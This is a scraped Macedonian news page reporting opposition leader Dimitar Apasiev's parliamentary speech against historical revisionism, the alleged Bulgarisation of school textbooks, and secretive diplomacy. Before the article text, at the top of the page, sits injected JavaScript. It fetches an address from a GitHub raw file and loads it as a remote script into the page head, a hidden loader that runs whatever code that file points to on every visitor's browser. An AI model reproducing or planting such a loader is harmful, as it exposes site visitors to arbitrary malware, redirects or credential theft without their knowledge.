;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Апасиев: Промовирате историски ревизионизам кој е погубен и го пере мозокот на нашите деца - Антропол
АктуелноЛокално

Апасиев: Промовирате историски ревизионизам кој е погубен и го пере мозокот на нашите деца

  • Севенци од историскиот говор на Претседателот на Левица – Димитар Апасиев на денешната собраниска Комисија за промена на Уставот, кој се однесува на делот на историската комисија која врши историска ревизија за бугаризација на Македонија и претставува груба пропаганда која се спроведува преку образованието директно врз децата.

Промовирате историски ревизионизам кој е погубен и го пере мозокот на нашите дечиња кои учат со лажни учебници, коишто историски комисии ги пишуваат за каков бил Цар Самуил а каков Гоце Делчев. Од позиција на сила сме наметнувале услови, а не сега да бидеме понижени и навредени какви што сме со вашата дипломатија.

Ајде пак да се вратиме во времето кога имавме држава. Во 1947 година, извор: Министерство за народна просвета на НР Бугарија, во бугарскиот учебник по историја за 3-ти клас на страна 40 и страна 41, се вели: „Самоиловата словенска држава не треба да се претставува како Западна Бугарија. Самоиловата држава е предимно држава на македонските Словени, и така треба да биде претставена“.

Ова е кога имаме држава и силна дипломатија, а не третокласни дипломати. Дипломатијата цело време беше таинствена, и ние не знаевме како пратеници и како орган кој вас ве контролира за што вие преговарете по ѓаволите. Целиот процес беше нетранспарентен, опозициијата исклучена, под странски диктат на туѓа држава која има територијални претензии спрема нас.

Сега се освестивте без двотретинско мнозинство, па сега ќе подадете рака на опозицијата. Касно е сега, готово. После свадба – тапани. Помина возот.